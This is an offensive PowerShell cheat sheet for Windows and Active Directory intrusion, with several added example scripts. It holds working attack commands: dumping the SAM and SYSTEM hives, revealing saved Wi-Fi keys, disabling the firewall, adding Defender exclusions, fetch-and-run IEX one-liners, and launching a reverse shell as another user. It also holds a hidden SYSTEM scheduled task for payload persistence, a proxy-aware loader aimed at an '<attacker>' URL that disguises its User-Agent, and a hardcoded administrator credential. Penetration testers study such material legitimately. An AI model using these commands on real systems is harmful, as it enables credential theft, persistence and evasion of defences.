Powershell
Table of contents
- Create an admin user
- Run as domain user
- Copy a full directory
- Check hives rights
- Display wifi passwords
- Download file
- Run as another user
- Use system proxy
- IEX downloadstring
- Set environment variable
- Add exclusion folder to WinDefender
- Disable firewall
- Dump SAM
- Activate RDP
- List RDP connection on a machine
- Kill process by name
- Scheduled task
- Domain Information
- Proxy Aware
- Import and Export Powershell objects
- Sites and subnet
Create an admin user
Create the user and add it to the local Administrators group (requires an elevated shell)
net user username password /add
net localgroup Administrators username /add
Run as domain user
Run a PowerShell as a domain user
runas /netonly /user:DOMAIN\USER "powershell.exe -Exec Bypass"
/netonly: the process runs locally under the current user, but every network authentication (SMB, LDAP, Kerberos, ...) is performed with the supplied domain credentials. The password is not verified at launch, so a wrong password only shows up when the first remote access fails.
Copy a full directory
Copy a full directory and its subdirectories (/s skips empty subdirectories; add /e to include them)
xcopy.exe /s source_absolute_path dest_absolute_path
Check hives rights
Use the Sysinternals binary accesschk.exe to check a registry hive ACL for a given principal (-k registry key, -s recurse, -u suppress errors, -q quiet; add -w to list only keys with write access)
accesschk.exe /accepteula -qusk "Users" HKLM\SOFTWARE\....
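The same check without dropping a Sysinternals binary on the host, as an added example (not part of the original page): enumerate the service keys under HKLM\SYSTEM\CurrentControlSet\Services on which the current token (user or any of its groups) holds write rights. A writable service key lets an unprivileged user rewrite ImagePath and hijack the service binary, which is the usual reason to check hive ACLs in the first place. Only built-in Get-Acl and .NET types are used.

```powershell
# Added example: find service registry keys the current user can modify.
# Any of these rights is enough to change ImagePath or add a Parameters subkey.
$writeRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor
               [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
               [System.Security.AccessControl.RegistryRights]::WriteKey -bor
               [System.Security.AccessControl.RegistryRights]::FullControl

# SIDs the current token can act as: the user itself plus every group in the token
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
    $key = $_
    # Keys we cannot even read the DACL of are skipped (they are not writable for us either)
    try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { return }

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Compare SIDs rather than names so localized group names still match
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }
        if ($mySids -notcontains $sid) { continue }
        if (($ace.RegistryRights -band $writeRights) -eq 0) { continue }

        [PSCustomObject]@{
            Service   = $key.PSChildName
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.RegistryRights
            ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
        }
    }
} | Format-Table -AutoSize
```

Deny ACEs are not evaluated here, so a key listed with an Allow ACE may still be blocked by an explicit Deny; confirm a hit by actually writing a harmless value before relying on it.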
Display wifi passwords
Display the saved key of a Wi-Fi profile knowing its SSID: list the profiles first, then query one with key=clear (run from an elevated prompt, otherwise the key line may be missing)
netsh wlan show profiles
netsh wlan show profile name="NETWORK" key=clear | Select-String 'Key Content'
Download file
Invoke-WebRequest -Uri ${url} -OutFile ${outFile}
Run as another user
Run an executable as another user. Useful to launch a reverse shell with another user's privileges. Note that the last argument of Process.Start is the account's domain (use "." for a local account), not the hostname.
$secpasswd = ConvertTo-SecureString ${password} -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential (${username}, $secpasswd)
$domain = "${domain}"
[System.Diagnostics.Process]::Start(${reverseShellPath}, "", $mycreds.UserName, $mycreds.Password, $domain)
Same thing through PowerShell remoting (WinRM must be enabled on the target, here localhost):
$username = "BART\Administrator"
$password = "3130438f31186fbaf962f407711faddb"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $secstr
Invoke-Command -ScriptBlock { XXXXXX } -Credential $cred -ComputerName localhost
Use system proxy
Use the configured system proxy (authenticating with the current user's credentials) to perform requests. Keep the WebClient in a variable: setting the credentials on a throw-away object has no effect.
$wc = New-Object System.Net.WebClient
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
# Force TLS 1.2 (older .NET defaults to TLS 1.0 and fails against modern servers)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX downloadstring
Download a remote PowerShell script and execute it from memory
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('${URI}/file.ps1')"
Set environment variable
Set the value of an environment variable.
Set-Content -Path Env:${EnvVar} -Value ${NewValue}
Add exclusion folder to WinDefender
Add a directory that Windows Defender will not scan (requires admin)
Set-MpPreference -ExclusionPath "C:\Temp"
Disable firewall
Fully disable the Windows firewall on all profiles (requires admin)
netsh advfirewall set allprofiles state off
Dump SAM
Save the SAM and SYSTEM hives (requires admin; SYSTEM holds the boot key needed to decrypt the SAM). Saving HKLM\SECURITY the same way also gives the LSA secrets and cached domain credentials.
reg save HKLM\SAM ./SAM.save
reg save HKLM\System ./System.save
Activate RDP
Enable and authorize RDP connections (requires admin)
# Allow RDP connections
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -Value 0
# Require Network Level Authentication (set to 0 to allow clients that cannot pre-authenticate)
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -Value 1
# Allow RDP traffic through the firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
List RDP connection on a machine
List the users having an RDP session on the targeted machine (qwinsta run remotely through WinRM)
$DSC = (New-Object System.Management.Automation.PSCredential("${domain}\${user}", (ConvertTo-SecureString "${password}" -AsPlainText -Force)))
Invoke-Command {qwinsta} -ComputerName ${ip} -Credential $DSC
Kill process by name
Kill all processes with a specific name
taskkill /IM ${processName} /F
Scheduled task
# Define the task
# Adjust /sc (schedule type) and /mo (modifier) to the timing you need; add /ru SYSTEM from an elevated shell to run it as SYSTEM
schtasks /create /sc hourly /mo 1 /tn "${taskname}" /tr "${command}"
# Force the task execution
schtasks /run /tn "${taskname}"
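The same persistence built with the ScheduledTasks module instead of schtasks.exe, as an added example (not from the original page). It registers a hidden task that fires at every logon and then every hour, running as SYSTEM, and checks that it ran. The task name and payload path are placeholders; the SYSTEM principal needs an elevated shell.

```powershell
# Added example: hourly + at-logon task running as SYSTEM via the ScheduledTasks cmdlets.
$taskName = 'WindowsUpdateCheck'            # placeholder
$payload  = 'C:\Windows\Temp\payload.exe'   # placeholder

$action   = New-ScheduledTaskAction -Execute $payload

$triggers = @(
    (New-ScheduledTaskTrigger -AtLogOn),
    (New-ScheduledTaskTrigger -Once -At (Get-Date) `
        -RepetitionInterval (New-TimeSpan -Hours 1) `
        -RepetitionDuration (New-TimeSpan -Days 3650))
)

# Run as SYSTEM with highest privileges; drop -Principal to run as the current user
$principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest

# Hidden from the default Task Scheduler view, and not skipped on laptops running on battery
$settings  = New-ScheduledTaskSettingsSet -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries

Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $triggers `
    -Principal $principal -Settings $settings -Force | Out-Null

# Force a first run and verify it executed (LastTaskResult 0 = success)
Start-ScheduledTask -TaskName $taskName
Start-Sleep -Seconds 2
Get-ScheduledTask -TaskName $taskName | Get-ScheduledTaskInfo |
    Select-Object TaskName, LastRunTime, LastTaskResult

# Cleanup when done:
# Unregister-ScheduledTask -TaskName $taskName -Confirm:$false
```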
Domain Information
The cmdlets below are PowerView (PowerSploit) functions; load PowerView.ps1 first (e.g. with the IEX downloadstring one-liner above).
Get password policy
Get-DomainPolicyData | select -ExpandProperty SystemAccess
Get domain user information
Get-DomainUser -Identity nlamb
Get computer information
Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
# Enumerate machines where a domain user or group is pushed into a local group (here Administrators) through GPO Restricted Groups / Group Policy Preferences
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
Get Organization Unit
Get-DomainOU -Properties Name | sort -Property Name
Get group information
Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
Get GPO
Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
Get-DomainGPO -ComputerIdentity ${ComputerName} -Properties DisplayName | sort -Property DisplayName
# GPO modifying local group membership
Get-DomainGPOLocalGroup | select GPODisplayName, GroupName
Get Session information
Get the SMB sessions open on the local (or a remote) machine. CName is the source of the connection, which is how you find where a given user is logged on from.
Get-NetSession -ComputerName ${computerName} | select CName, UserName
Proxy Aware
Proxy-aware variant of the IEX downloadstring one-liner (uses the system proxy with the current user's credentials)
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")
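The "Use system proxy", "IEX downloadstring" and "Proxy Aware" snippets above combined into one reusable function, as an added example (not from the original page). It pins TLS 1.2, goes through the system proxy with the caller's domain credentials, reports proxy or TLS failures instead of silently doing nothing, and either saves the script, returns it, or runs it in memory. The URL, output path and User-Agent string are placeholders.

```powershell
# Added example: proxy-aware, TLS 1.2 download with optional in-memory execution.
function Get-RemoteScript {
    param(
        [Parameter(Mandatory)] [string] $Url,
        [string] $OutFile,   # when set, write the content to disk instead of returning it
        [switch] $Invoke     # when set, execute the content in the current session
    )

    # Older .NET defaults to TLS 1.0, which modern servers reject
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

    $wc = New-Object System.Net.WebClient
    # Reuse the proxy configured on the host and authenticate to it as the current user,
    # so an authenticating corporate proxy lets the request out
    $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
    $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
    # Placeholder UA: the default WebClient UA stands out in proxy logs
    $wc.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'

    try {
        $body = $wc.DownloadString($Url)
    } catch [System.Net.WebException] {
        # 407 = proxy wants other credentials; TLS and DNS errors also land here
        Write-Warning "Download of $Url failed: $($_.Exception.Message)"
        return
    }

    if ($OutFile) { Set-Content -Path $OutFile -Value $body; return }
    if ($Invoke)  { Invoke-Expression $body; return }
    return $body
}

# Usage (placeholder URL):
# Get-RemoteScript -Url 'http://<attacker>/file.ps1' -Invoke
# Get-RemoteScript -Url 'http://<attacker>/file.ps1' -OutFile C:\Windows\Temp\file.ps1
```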
Import and Export Powershell objects
Serialize the result of a query to XML so it can be reloaded and filtered offline later
Get-ADComputer -Filter * | Export-Clixml C:\Users\Administrator\computers.xml
$computers = Import-Clixml C:\Users\Administrator\computers.xml
$computers | ? {$_.DistinguishedName -match "cicd"}
$computers | ? {$_.DistinguishedName -eq "XXXXXX"}
Sites and subnet
List the AD subnets from the configuration partition (fill in the domain components of the forest root)
Get-ADObject -SearchBase "cn=Configuration,dc=${},dc=${}" -LDAPFilter "(objectClass=subnet)" -Server ${dcIp} -Properties *
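Subnets on their own are only half the picture; what you usually want is which site (and therefore which DCs and physical location) each subnet belongs to. The script below, an added example not from the original page, resolves the configuration naming context automatically and joins each subnet to its site through the siteObject attribute. It assumes the ActiveDirectory (RSAT) module and a reachable DC; the DC name is a placeholder.

```powershell
# Added example: map every AD subnet to its site using the configuration partition.
Import-Module ActiveDirectory
$dc = 'dc01.corp.local'   # placeholder

# Ask the DC for the configuration NC instead of hardcoding dc=...,dc=...
$configNC = (Get-ADRootDSE -Server $dc).configurationNamingContext

# DN -> site name lookup table
$sites = @{}
Get-ADObject -SearchBase "CN=Sites,$configNC" -LDAPFilter '(objectClass=site)' -Server $dc -Properties Name |
    ForEach-Object { $sites[$_.DistinguishedName] = $_.Name }

Get-ADObject -SearchBase "CN=Subnets,CN=Sites,$configNC" -LDAPFilter '(objectClass=subnet)' `
              -Server $dc -Properties Name, siteObject, Description, Location |
    ForEach-Object {
        [PSCustomObject]@{
            Subnet      = $_.Name                      # e.g. 10.10.1.0/24
            # siteObject is the DN of the owning site; unassigned subnets have none
            Site        = if ($_.siteObject) { $sites[$_.siteObject] } else { '<unassigned>' }
            Description = $_.Description
            Location    = $_.Location
        }
    } | Sort-Object Site, Subnet | Format-Table -AutoSize
```

Description and Location are free-text attributes that admins often fill with building or office names, which makes this output a quick way to turn an IP range into a physical location during an engagement.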